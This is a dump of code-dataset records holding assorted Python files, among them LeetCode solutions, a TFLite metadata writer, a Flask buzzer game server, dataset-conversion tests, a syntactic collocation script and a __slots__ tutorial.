| Column | Type |
| --- | --- |
| hexsha | string (length 40) |
| size | int64 (6 to 782k) |
| ext | string (7 classes) |
| lang | string (1 class) |
| max_stars_repo_path | string (length 4 to 237) |
| max_stars_repo_name | string (length 6 to 72) |
| max_stars_repo_head_hexsha | string (length 40) |
| max_stars_repo_licenses | list |
| max_stars_count | int64 (1 to 53k), nullable |
| max_stars_repo_stars_event_min_datetime | string (length 24), nullable |
| max_stars_repo_stars_event_max_datetime | string (length 24), nullable |
| max_issues_repo_path | string (length 4 to 184) |
| max_issues_repo_name | string (length 6 to 72) |
| max_issues_repo_head_hexsha | string (length 40) |
| max_issues_repo_licenses | list |
| max_issues_count | int64 (1 to 27.1k), nullable |
| max_issues_repo_issues_event_min_datetime | string (length 24), nullable |
| max_issues_repo_issues_event_max_datetime | string (length 24), nullable |
| max_forks_repo_path | string (length 4 to 184) |
| max_forks_repo_name | string (length 6 to 72) |
| max_forks_repo_head_hexsha | string (length 40) |
| max_forks_repo_licenses | list |
| max_forks_count | int64 (1 to 12.2k), nullable |
| max_forks_repo_forks_event_min_datetime | string (length 24), nullable |
| max_forks_repo_forks_event_max_datetime | string (length 24), nullable |
| content | string (length 6 to 782k) |
| avg_line_length | float64 (2.75 to 664k) |
| max_line_length | int64 (5 to 782k) |
| alphanum_fraction | float64 (0 to 1) |
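Each record below lists these columns in order as a single pipe-separated row, followed by the file's `content` and a closing `avg_line_length | max_line_length | alphanum_fraction` row. As a minimal sketch of how rows with this schema might be read programmatically, assuming the dump comes from a Hugging Face-style dataset (the dataset name below is a hypothetical placeholder, not taken from this document):

```python
# Hedged sketch: iterate over records that follow the column schema above.
# "some-org/python-code-dump" is a hypothetical placeholder dataset name.
from datasets import load_dataset

ds = load_dataset("some-org/python-code-dump", split="train", streaming=True)
for row in ds:
    # Metadata cells, named exactly as in the schema table.
    print(row["hexsha"], row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
    # The Python source file itself is stored in the "content" column.
    print(row["content"][:120])
    break
```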
abb50af6b7515480308ed4bb0d9a4639ac7b7b92 | 541 | py | Python | leetcode/047-Permutations-II/Perm2_003.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | ["MIT"] | 1 | 2015-12-16T04:01:03.000Z | 2015-12-16T04:01:03.000Z | leetcode/047-Permutations-II/Perm2_003.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | ["MIT"] | 1 | 2016-02-09T06:00:07.000Z | 2016-02-09T07:20:13.000Z | leetcode/047-Permutations-II/Perm2_003.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | ["MIT"] | 2 | 2019-06-27T09:07:26.000Z | 2019-07-01T04:40:13.000Z |
class Solution:
# @param {integer[]} nums
# @return {integer[][]}
def permuteUnique(self, nums):
if len(nums) == 1:
return [nums]
nums.sort()
res = []
i = 0
while i < len(nums):
sym = nums[i]
tmp = nums[:i] + nums[i + 1:]
sub = self.permuteUnique(tmp)
res.extend([[nums[i]] + s for s in sub])
while i < len(nums):
if nums[i] != sym:
break
i += 1
return res
| 27.05 | 52 | 0.406654 |
055253959bb9b57cbb2874fe7f19b95144529cdb | 4,480 | py | Python | yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | yolov5-coreml-tflite-converter/tflite/tf_metadata/output_metadata_writer.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null |
import os
from tflite_support import metadata_schema_py_generated as _metadata_fb
from constants import BOUNDINGBOX_NAME, CLASSES_NAME, SCORES_NAME, NUMBER_NAME, DETECTIONS_NAME, PREDICTIONS_NAME
from tf_metadata.metadata_utils import MetadataHelper
class OutputMetadataWriter(MetadataHelper):
def __init__(self, output_order, labels_path, nb_labels, max_det, multiple_outputs=False):
self.output_order = output_order
self.labels_path = labels_path
self.nb_labels = nb_labels
self.max_det = max_det
self.multiple_outputs = multiple_outputs
def write(self):
if self.multiple_outputs:
if len(self.output_order) != 4:
raise ValueError(
f"Expected 4 output ({BOUNDINGBOX_NAME}, {CLASSES_NAME}, {SCORES_NAME}, {NUMBER_NAME}) but got {len(self.output_order)} output{'s' if len(self.output_order) > 1 else ''} ({', '.join(self.output_order)})")
yxyx_meta = self.__create_yxyx_meta()
class_meta = self.__create_class_meta()
score_meta = self.__create_score_meta()
nb_detected_meta = self.__create_nb_detected_meta()
group = _metadata_fb.TensorGroupT()
group.name = DETECTIONS_NAME
group.tensorNames = [yxyx_meta.name, class_meta.name, score_meta.name]
output_map = {BOUNDINGBOX_NAME: yxyx_meta, CLASSES_NAME: class_meta,
SCORES_NAME: score_meta, NUMBER_NAME: nb_detected_meta}
output_metadata = [output_map[output_name] for output_name in self.output_order]
output_group = [group]
return output_metadata, output_group
else:
# Predictions
if len(self.output_order) != 1:
raise ValueError(
f"Expected 1 output ({PREDICTIONS_NAME}) but got {len(self.output_order)} output{'s' if len(self.output_order) > 1 else ''} ({', '.join(self.output_order)})")
predictions_meta = self.__create_prediction_meta()
return [predictions_meta], None
def __create_prediction_meta(self):
predictions_meta = _metadata_fb.TensorMetadataT()
predictions_meta.name = PREDICTIONS_NAME
predictions_meta.description = "The predictions made by each grid cell of the model on which one needs to run NMS."
self._add_content_feature(predictions_meta)
self._add_stats(predictions_meta, 1.0, 0)
self.__add_labels_file(predictions_meta)
return predictions_meta
def __create_yxyx_meta(self):
yxyx_meta = _metadata_fb.TensorMetadataT()
yxyx_meta.name = BOUNDINGBOX_NAME
yxyx_meta.description = "The bounding boxes coordinates (x1, y1) upper left, (x2, y2) bottom right (normalized to input image - resized)."
self._add_content_bounding_box(yxyx_meta)
self._add_range(yxyx_meta)
self._add_stats(yxyx_meta, 1.0, 0.0)
return yxyx_meta
def __create_class_meta(self):
class_meta = _metadata_fb.TensorMetadataT()
class_meta.name = CLASSES_NAME
class_meta.description = "The class corresponding to each bounding box."
self._add_content_feature(class_meta)
self._add_range(class_meta)
self._add_stats(class_meta, self.nb_labels, 0)
self.__add_labels_file(class_meta)
return class_meta
def __create_score_meta(self):
score_meta = _metadata_fb.TensorMetadataT()
score_meta.name = SCORES_NAME
score_meta.description = "The confidence score corresponding to each bounding box."
self._add_content_feature(score_meta)
self._add_range(score_meta)
self._add_stats(score_meta, 1.0, 0.0)
return score_meta
def __create_nb_detected_meta(self):
nb_detected_meta = _metadata_fb.TensorMetadataT()
nb_detected_meta.name = NUMBER_NAME
nb_detected_meta.description = "The number of detected bounding boxes."
self._add_content_feature(nb_detected_meta)
self._add_stats(nb_detected_meta, self.max_det, 0.0)
return nb_detected_meta
def __add_labels_file(self, meta):
label_file = _metadata_fb.AssociatedFileT()
label_file.name = os.path.basename(self.labels_path)
label_file.description = "Labels for objects that the model can detect."
label_file.type = _metadata_fb.AssociatedFileType.TENSOR_VALUE_LABELS
meta.associatedFiles = [label_file]
| 46.666667 | 224 | 0.691518 |
055b9b1ed902e749b70bf960bf976fec8934c8c6 | 243 | py | Python | power-of-three/power-of-three.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | ["MIT"] | 2 | 2021-12-05T14:29:06.000Z | 2022-01-01T05:46:13.000Z | power-of-three/power-of-three.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | ["MIT"] | null | null | null | power-of-three/power-of-three.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | ["MIT"] | null | null | null |
class Solution:
def isPowerOfThree(self, n: int) -> bool:
if n<=0:
return False
while(n>1):
if n%3==0:
n/=3
else:
return False
return True
| 22.090909 | 45 | 0.395062 |
fb25547f89b759492d407eeb6a815e4b58adb01f | 423 | py | Python | minimax.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | ["MIT"] | null | null | null | minimax.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | ["MIT"] | null | null | null | minimax.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | ["MIT"] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# https://www.hackerrank.com/challenges/mini-max-sum/problem
def miniMaxSum(arr):
sortedArr = sorted(arr)
smallest = sum(sortedArr) - sortedArr[-1]
largest = sum(sortedArr) - sortedArr[0]
print(str(smallest) + " " + str(largest))
if __name__ == '__main__':
arr = list(map(int, input().rstrip().split()))
miniMaxSum(arr)
| 18.391304 | 60 | 0.671395 |
34cc065b01200580f70ecf4add62902c5755d542 | 1,813 | py | Python | coco2yolov5-converter/tests/converter/test_filesystem_util.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | coco2yolov5-converter/tests/converter/test_filesystem_util.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null | coco2yolov5-converter/tests/converter/test_filesystem_util.py | SchweizerischeBundesbahnen/sbb-ml-models | 485356aeb0a277907c160d435f7f654154046a70 | ["MIT"] | null | null | null |
# disabling PyLint docstring, no-self-using
# pylint: disable=C0114,C0115,C0116,R0201
import tempfile
from pathlib import Path
from unittest.case import TestCase
from src.converter.filesystem_util import FileSystemUtil
class YoloHelperTest(TestCase):
def test_folder_structure(self):
with tempfile.TemporaryDirectory() as tmp_dir:
print('created temporary directory', tmp_dir)
output_path = Path(tmp_dir) / 'output'
test_items = [
output_path / 'images' / 'train',
output_path / 'images' / 'val',
output_path / 'labels' / 'train',
output_path / 'labels' / 'val',
]
FileSystemUtil.create_yolo_folder_structure(output_path)
for test_item in test_items:
self.assertTrue(test_item.exists())
self.assertTrue(test_item.is_dir())
# even better: does it contain more folders/files than needed?
def test_folder_structure_can_be_created_multiple_times(self):
with tempfile.TemporaryDirectory() as tmp_dir:
print('created temporary directory', tmp_dir)
output_path = Path(tmp_dir) / 'output'
test_items = [
output_path / 'images' / 'train',
output_path / 'images' / 'val',
output_path / 'labels' / 'train',
output_path / 'labels' / 'val',
]
FileSystemUtil.create_yolo_folder_structure(output_path)
FileSystemUtil.create_yolo_folder_structure(output_path)
for test_item in test_items:
self.assertTrue(test_item.exists())
self.assertTrue(test_item.is_dir())
# even better: does it contain more folders/files than needed?
| 37.770833 | 74 | 0.614451 |
fd37ded0af851467dd99af7d68b33ab91df9e723 | 4,868 | py | Python | python/main.py | MegaAdragon/MagicBuzzer | f1cd2aab7827045a82b0d5e6643d48b06cbf27af | ["MIT"] | null | null | null | python/main.py | MegaAdragon/MagicBuzzer | f1cd2aab7827045a82b0d5e6643d48b06cbf27af | ["MIT"] | null | null | null | python/main.py | MegaAdragon/MagicBuzzer | f1cd2aab7827045a82b0d5e6643d48b06cbf27af | ["MIT"] | null | null | null |
import math
import socket
import time
import math
import select
import threading
from flask import Flask, render_template, request, jsonify, make_response
clients = []
app = Flask(__name__)
def get_client(**kwargs):
if len(clients) < 1:
return None
for key, value in kwargs.items():
for c in clients:
if c[key] == value:
return c
return None
def reset_buzzer():
for c in clients:
c['socket'].sendall(bytearray([0x10, 0xFF]))
c['buzzered'] = False
c['buzzerTick'] = 0
@app.route('/')
def home():
return render_template('buzzer.html', clients=clients)
@app.route('/api/v1/buzzer/all', methods=['GET'])
def api_all():
buzzer_list = []
# FIXME: this is not very efficient
for c in clients:
buzzer = {'addr': c['addr']}
if 'buzzered' in c:
buzzer['buzzered'] = c['buzzered']
buzzer['buzzerTick'] = c['buzzerTick']
if c['addr'] == '192.168.0.70' or c['addr'] == '192.168.0.23':
buzzer['color'] = '#478eff'
elif c['addr'] == '192.168.0.183' or c['addr'] == '192.168.0.24':
buzzer['color'] = '#fcf568'
elif c['addr'] == '192.168.0.17':
buzzer['color'] = '#ff5e5e'
buzzer_list.append(buzzer)
return jsonify(buzzer_list)
@app.route('/api/v1/buzzer/reset', methods=['POST'])
def api_reset():
reset_buzzer()
return make_response("Success", 200)
def handle_data(sock, cmd, data):
if cmd == 0x01 and len(data) == 4:
buzzerTick = int.from_bytes(data, byteorder='little')
print(tick, "BUZZERED", sock.getpeername(), buzzerTick)
c = get_client(socket=sock)
c['buzzered'] = True
c['buzzerTick'] = buzzerTick
elif cmd == 0xAA:
c = get_client(socket=sock)
c['heartbeat'] = tick
else:
print(sock.getpeername(), "unknown server response")
assert False
data_buffer = bytes()
def on_data_received(sock, data):
global data_buffer
data_buffer += data
header_size = 2
while True:
if len(data_buffer) < header_size:
# not enough data
break
header = data_buffer[:header_size]
size = header[1]
if len(data_buffer) < header_size + size:
# wait for complete payload
break
# Read the content of the message body
body = data_buffer[header_size:header_size + size]
# data processing
handle_data(sock, header[0], body)
# Get the next packet
data_buffer = data_buffer[header_size + size:]
if __name__ == '__main__':
# run flask in own thread
threading.Thread(target=app.run, daemon=True, kwargs={'host': '0.0.0.0', 'port': 5000, 'debug': False}).start()
start_time = time.time()
udp_sync_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
udp_sync_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# listen to this port
udp_sync_socket.bind(('', 4210))
udp_sync_socket.settimeout(1)
udp_sync_socket.setblocking(False)
last_sync = 0
last_check_alive = 0
while True:
tick = (time.time() - start_time) * 1000 # tick in ms
if time.time() - last_sync > 5.0:
last_sync = time.time()
print("sync broadcast send", math.ceil(tick))
udp_sync_socket.sendto(math.ceil(tick).to_bytes(4, byteorder='little'), ('<broadcast>', 4210))
try:
data, addr = udp_sync_socket.recvfrom(128)
# FIXME
if addr[0] != '192.168.0.247':
print(tick, "tick from", addr, int.from_bytes(data, byteorder='little'))
c = get_client(addr=addr[0])
if c is None:
print("open TCP socket")
c = {'socket': socket.socket(socket.AF_INET, socket.SOCK_STREAM), 'addr': addr[0]}
c['socket'].settimeout(1)
c['socket'].connect((addr[0], 9999))
c['heartbeat'] = tick
clients.append(c)
except socket.error:
pass # no data yet
socket_list = []
for c in clients:
socket_list.append(c['socket'])
# Get the list sockets which are readable
read_sockets, write_sockets, error_sockets = select.select(socket_list, [], socket_list, 0.1)
for sock in read_sockets:
data = sock.recv(128)
on_data_received(sock, data)
for sock in error_sockets:
print("error socket", sock)
assert False
        for c in list(clients):  # iterate over a copy so removing a client is safe
if tick - c['heartbeat'] > 3000:
print(c['socket'].getpeername(), "Heartbeat timeout")
clients.remove(c)
time.sleep(0.1)
| 27.817143 | 115 | 0.572514 |
b5c5680c3e49184800e562878d10e979ec562de2 | 2,507 | py | Python | TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py | mcwimm/pyMANGA | 6c7b53087e53b116bb02f91c33974f3dfd9a46de | ["MIT"] | 1 | 2021-03-16T08:35:50.000Z | 2021-03-16T08:35:50.000Z | TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py | mcwimm/pyMANGA | 6c7b53087e53b116bb02f91c33974f3dfd9a46de | ["MIT"] | 67 | 2019-11-14T11:29:52.000Z | 2022-03-09T14:37:11.000Z | TreeOutputLib/OneTreeOneFile/OneTreeOneFile.py | mcwimm/pyMANGA | 6c7b53087e53b116bb02f91c33974f3dfd9a46de | ["MIT"] | 6 | 2019-11-12T11:11:41.000Z | 2021-08-12T13:57:22.000Z |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: [email protected]
"""
from TreeOutputLib.OneTimestepOneFile.OneTimestepOneFile import \
OneTimestepOneFile
import os
## Output class. This class creates one file per tree at a defined location.
# A line containing time, position, desired geometric measures and desired
# parameters is written at every nth timestep.
class OneTreeOneFile(OneTimestepOneFile):
    ## Constructor. Clears any files already present in the output directory so each tree gets a fresh file.
# @param args xml element parsed from project to this constructor.
def __init__(self, args):
super().__init__(args)
for path in os.listdir(self.output_dir):
full_path = os.path.join(self.output_dir, path)
if os.path.isfile(full_path):
os.remove(full_path)
## Writes output to predefined folder
# For each tree a file is created and updated throughout the simulation.
# This function is only able to work, if the output directory exists and
# is empty at the begin of the model run
def writeOutput(self, tree_groups, time):
self._output_counter = (self._output_counter %
self.output_each_nth_timestep)
if self._output_counter == 0:
delimiter = "\t"
files_in_folder = os.listdir(self.output_dir)
for group_name, tree_group in tree_groups.items():
for tree in tree_group.getTrees():
growth_information = tree.getGrowthConceptInformation()
filename = (group_name + "_" + "%09.0d" % (tree.getId()) +
".csv")
file = open(os.path.join(self.output_dir, filename), "a")
if filename not in files_in_folder:
string = ""
string += 'time' + delimiter + 'x' + delimiter + 'y'
string = super().addSelectedHeadings(string, delimiter)
string += "\n"
file.write(string)
string = ""
string += (str(time) + delimiter + str(tree.x) +
delimiter + str(tree.y))
string = super().addSelectedOutputs(
tree, string, delimiter, growth_information)
string += "\n"
file.write(string)
file.close()
self._output_counter += 1
| 43.982456 | 79 | 0.568408 |
c83b4611a39b9c68094fd83f1e017bc9d92d38b3 | 4,590 | py | Python | Utils/py/ball_detector/combine_patches.py | tarsoly/NaoTH | dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52 | ["ECL-2.0", "Apache-2.0"] | null | null | null | Utils/py/ball_detector/combine_patches.py | tarsoly/NaoTH | dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52 | ["ECL-2.0", "Apache-2.0"] | null | null | null | Utils/py/ball_detector/combine_patches.py | tarsoly/NaoTH | dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52 | ["ECL-2.0", "Apache-2.0"] | null | null | null |
#!/usr/bin/python
import os
import sys
from scipy import misc
import numpy as np
import json
from naoth import matlab_tools as mat
import patchReader as patchReader
patch_size = (12, 12) # width, height
def load_labels(patchdata, file):
if not os.path.isfile(file):
print('Label file does not exist. To export the patches regardless run this file with the --all option')
return
patch_to_label = np.negative(np.ones((len(patchdata),), dtype=np.int))
label_ids = []
with open(file, 'r') as data_file:
labels = json.load(data_file)
for name in labels:
patch_to_label[labels[name]] = len(label_ids)
label_ids += [name]
return patch_to_label, label_ids
def log_to_matrix(path):
print("Process: {}".format(path))
# type: 0-'Y', 1-'YUV', 2-'YUVC'
patchtype = 0
patchdata, _ = patchReader.read_all_patches_from_log(path, type = patchtype)
if len(patchdata) == 0:
print("ERROR: file doesn't contain any patches of the type {0}".format(patchtype))
return
# load the label file
base_file, file_extension = os.path.splitext(path)
label_file = base_file + '.json'
if not os.path.exists(label_file):
        print("ERROR: file with labels does not exist: {}".format(label_file))
return
patch_to_label, label_ids = load_labels(patchdata, label_file)
# export the patches
imgs = {}
for i in range(len(patchdata)):
p = patchdata[i]
if len(p) == 4*patch_size[0]*patch_size[1]:
a = np.array(p[0::4]).astype(float)
a = np.transpose(np.reshape(a, patch_size))
b = np.array(p[3::4]).astype(float)
b = np.transpose(np.reshape(b, patch_size))
else:
a = np.array(p).astype(float)
a = np.transpose(np.reshape(a, patch_size))
im = np.stack((a,a,a), axis=2)
if patch_to_label[i] not in imgs:
imgs[patch_to_label[i]] = [im]
else:
imgs[patch_to_label[i]] += [im]
# rgba
'''
rgba = np.zeros((patch_size[0],patch_size[1],4), dtype=np.uint8)
rgba[:,:,0] = a
rgba[:,:,1] = a
rgba[:,:,2] = a
rgba[:,:,3] = np.not_equal(b, 7)*255
cv2.imwrite(file_path, rgba)
'''
# grayscale
#yuv888 = np.zeros(patch_size[0]*patch_size[1], dtype=np.uint8)
#yuv888 = np.reshape(a, patch_size[0]*patch_size[1])
#gray_image = cv2.cvtColor(yuv888, cv2.COLOR_BGR2GRAY)
# remove green:
# gray + set green to 0 (used for balls)
# a = np.multiply(np.not_equal(b, 7), a)
#cv2.imwrite(file_path, a)
for i in imgs:
if i < 0:
name = "none"
else:
name = label_ids[i]
save_images(imgs[i], "{0}_{1}.png".format(os.path.basename(base_file),name))
def save_images(imgs, path):
    if len(imgs) == 0:
        print("ERROR: no patches to export")
        return
# HACK: for matlab we need a different shape
b = np.stack(imgs, axis = 3)
mat.savemat("./test.mat", {"images":b})
b = np.stack(imgs)
# HACK: multiply the channel
    print(b.shape)
if len(imgs[0].shape) == 2:
b = np.stack((b,b,b), axis = 3)
    print(b.shape)
print (imgs[0].shape)
# export a matrix
s = imgs[0].shape[0]
assert(s == imgs[0].shape[1])
n = 100
m = int(b.shape[0]/n)
if m*n < b.size:
m += 1
    print(s, n, m)
M = np.zeros((s*m,s*n,3))
for i in range(0,b.shape[0]):
x = i % n
y = int(i / n)
M[s*y:s*(y+1),s*x:s*(x+1),:] = b[i,:,:,:]
    print(M.shape)
misc.imsave(path,M)
def directory_to_matrix(path, name=None):
if name is None:
name = os.path.basename(path)
print("Process: {}".format(path))
imgs = []
for filename in os.listdir(path):
file_path = os.path.join(path, filename)
if filename.endswith('.png'):
im = misc.imread(file_path)
# add the channel dimension
if len(im.shape) == 2:
im = np.expand_dims(im, axis = 2)
imgs += [im]
elif os.path.isdir(file_path):
directory_to_matrix(file_path, name + '_' + filename)
elif filename.endswith(".log"):
log_to_matrix(file_path)
if len(imgs) == 0:
print("No images found")
return None
else:
print("Images found: {}".format(len(imgs)))
if not os.path.isdir('./export'):
os.mkdir('./export')
save_images(imgs, './export/{0}.png'.format(name))
if __name__ == "__main__":
if len(sys.argv) > 1:
path = sys.argv[-1]
if os.path.exists(path) and os.path.isdir(path):
directory_to_matrix(path)
elif path.endswith(".log"):
log_to_matrix(path)
else:
            print("ERROR: path doesn't exist", path)
| 25.359116 | 110 | 0.602397 |
c0b86c65e559fe1b3c42c1561da2c3872b2ecf16 | 43 | py | Python | src/__init__.py | andrewnachtigal/wind-forecasting | ac3669f10d5709ae202b254eb8519b0730109467 | ["MIT"] | null | null | null | src/__init__.py | andrewnachtigal/wind-forecasting | ac3669f10d5709ae202b254eb8519b0730109467 | ["MIT"] | null | null | null | src/__init__.py | andrewnachtigal/wind-forecasting | ac3669f10d5709ae202b254eb8519b0730109467 | ["MIT"] | 1 | 2019-10-08T04:18:41.000Z | 2019-10-08T04:18:41.000Z |
# treat directories as containing packages
| 21.5 | 42 | 0.837209 |
f19b0435f47b13ece319bca6391556e45a379267 | 239 | py | Python | packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-rest-doll/src/watchmen_rest_doll/sso/sso_router.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null |
from fastapi import FastAPI
from watchmen_rest_doll.doll import ask_saml2_enabled
def install_sso_router(app: FastAPI) -> None:
if ask_saml2_enabled():
from .saml import auth_saml_router
app.include_router(auth_saml_router.router)
| 23.9 | 53 | 0.820084 |
8d7321c5cee72da0e57fa059d40128166642c5e1 | 1,306 | py | Python | tmp/tmp_app.py | yao6891/FlaskOrdering | cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807 | ["Apache-2.0"] | 6 | 2020-04-30T08:05:51.000Z | 2021-12-23T02:49:01.000Z | tmp/tmp_app.py | yao6891/FlaskOrdering | cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807 | ["Apache-2.0"] | null | null | null | tmp/tmp_app.py | yao6891/FlaskOrdering | cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807 | ["Apache-2.0"] | 2 | 2020-06-15T03:30:45.000Z | 2020-08-02T11:21:03.000Z |
from flask import Flask, url_for, request
from common.libs.UrlUtils import UrlManager
from tmp.tmp_route_map import route_order
from flask_sqlalchemy import SQLAlchemy
"""
Each release has a version number: 201811271629
"""
app = Flask(__name__)
app.register_blueprint(route_order, url_prefix='/order')
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]/mysql'
track_modifications = app.config.setdefault('SQLALCHEMY_TRACK_MODIFICATIONS', True)
db = SQLAlchemy(app)
@app.route('/')
def hello_world():
url = url_for('index')
url_1 = UrlManager.build_url('/api')
url_2 = UrlManager.build_static_url("/css/reset.css")
msg = f'Hello World! url: {url} ; url_1:{url_1} ; url_2: {url_2}'
app.logger.error(msg)
app.logger.info(msg)
app.logger.debug(msg)
return msg
@app.route('/api')
def index():
return 'index page'
@app.route('/api/hello')
def hello():
from sqlalchemy import text
sql = text("SELECT * FROM `user`")
result = db.engine.execute(sql)
for row in result:
app.logger.info(row)
return 'api - hello '
@app.errorhandler(404)
def page_not_found(error):
app.logger.error(request.path)
app.logger.error(error)
return 'this page does not exist', 404
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
| 22.912281 | 83 | 0.694487 |
93b5aea78b03946fe758e5177103dbda4c8b403a | 3,886 | py | Python | collocations_syntax.py | melandresen/DHd2020 | 62a53be823364dd3360e377d569e706ffeb738f9 | ["Apache-2.0"] | null | null | null | collocations_syntax.py | melandresen/DHd2020 | 62a53be823364dd3360e377d569e706ffeb738f9 | ["Apache-2.0"] | null | null | null | collocations_syntax.py | melandresen/DHd2020 | 62a53be823364dd3360e377d569e706ffeb738f9 | ["Apache-2.0"] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Python 3.7
# Author: Melanie Andresen ([email protected])
# written in the context of the research project hermA (www.herma.uni-hamburg.de)
# funded by Landesforschungsförderung Hamburg
########################################################################################
# calculate syntax-based collocations
########################################################################################
import re
import numpy as np
from scipy.stats import chi2_contingency
import pandas as pd
from collections import Counter
from corpus_classes import Corpus
def get_relations(corpus):
"""
Extract a list of binary syntactic relations from the corpus
input: Corpus object (see corpus_classes.py)
output: list of all binary syntactic relations in the corpus
"""
relations = []
no_of_complex_verbs = 0
for text in corpus.files:
for sentence in text.sentences:
for word in sentence.words:
if word.head == 0: # skip the root
continue
head = sentence.words[word.head - 1] # identify head of current token
relations.append((word.lemma, word.deprel, head.lemma)) # append token, relation and head token
# additional handling of complex verb forms:
if re.match('VA', head.pos): # if head is auxiliary verb, search for dependent full verb
for word2 in sentence.words:
if word2.head == head.id and re.match('VV', word2.pos) and word2 != word:
relations.append((word.lemma, word.deprel, word2.lemma))
no_of_complex_verbs += 1
print('Relations from {} extracted.'.format(text.path))
print('(Added {} complex verbs)\n'.format(no_of_complex_verbs))
return relations
def get_collocations(relations):
"""
Calculate collocations based on the list of all relations in the corpus
input: list of all binary syntactic relations in the corpus (result of get_relations())
output: pandas DataFrame with all syntactic collocations and their llr scores
"""
print('Calculating collocations (this may take a while)...')
relation_types = set([item[1] for item in relations])
results = pd.DataFrame(columns=['word_1', 'relation', 'word_2', 'llr', 'frequency'])
for relation_type in relation_types:
print('Calculating scores for {}...'.format(relation_type))
instances = [item for item in relations if item[1] == relation_type]
bigram_counts = Counter(instances)
# The following line excludes collocations with frequency 1 from the calculation.
# Comment out if you want to include those.
bigram_counts = {k: v for (k,v) in bigram_counts.items() if v > 1}
unigram_counts_pos1 = Counter([item[0] for item in instances])
unigram_counts_pos2 = Counter([item[2] for item in instances])
all_bigrams_count = sum(bigram_counts.values())
for bigram in bigram_counts:
frequencies = np.array([[bigram_counts[bigram], unigram_counts_pos1[bigram[0]]], [unigram_counts_pos2[bigram[2]], all_bigrams_count]])
g, p, dof, expctd = chi2_contingency(frequencies, lambda_="log-likelihood")
results = results.append(pd.DataFrame([[bigram[0], bigram[1], bigram[2], g, bigram_counts[bigram]]], columns=['word_1', 'relation', 'word_2', 'llr', 'frequency']))
results = results.iloc[(-results['llr'].abs()).argsort()] # sort dataframe by absolute value of llr
results = results.reset_index(drop=True) # update index
return results
directory = 'demo-corpus/'
corpus = Corpus(directory)
relations = get_relations(corpus)
result = get_collocations(relations)
result.to_csv('collocations_syntax.txt', sep='\t')
| 44.159091 | 175 | 0.635872 |
191fb99d0f5ea76f1a66019c2cda39b21fcb2511 | 969 | py | Python | top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | 1 | 2020-01-16T09:23:43.000Z | 2020-01-16T09:23:43.000Z | top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | null | null | null | top/clearlight/base/liaoxuefeng/object_oriented_advanced_program/use__slots__.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | ["Apache-2.0"] | null | null | null |
from types import MethodType
# Using __slots__
'''
Restricting instance attributes: when defining a class, Python allows a special __slots__ variable that limits which attributes can be added to instances of that class
Note:
Attributes defined in __slots__ only take effect on instances of the current class; they have no effect on inheriting subclasses
__slots__ restricts the addition of instance attributes; it does not restrict the addition of class attributes
'''
class Student(object):
    # Use a tuple to define the attribute names that are allowed to be bound
__slots__ = ('name', 'age')
pass
'''
s = Student()
# Dynamically bind an attribute to the instance
s.name = 'Michael'
print(s.name)
# Bind a method to the instance
def set_age(self, age): # define a function to serve as an instance method
    self.age = age
# Bind the method to the instance
s.set_agea = MethodType(set_age, s)
s.set_agea(25)
print(s.age)
# A method bound to one instance does not work on other instances
# Bind a method to the class
def set_score(self, score):
self.score = score
Student.set_score = set_score
s.set_score(100)
print(s.score)
s2 = Student()
s2.set_score(200)
print(s2.score)
'''
# Create a new instance
s = Student()
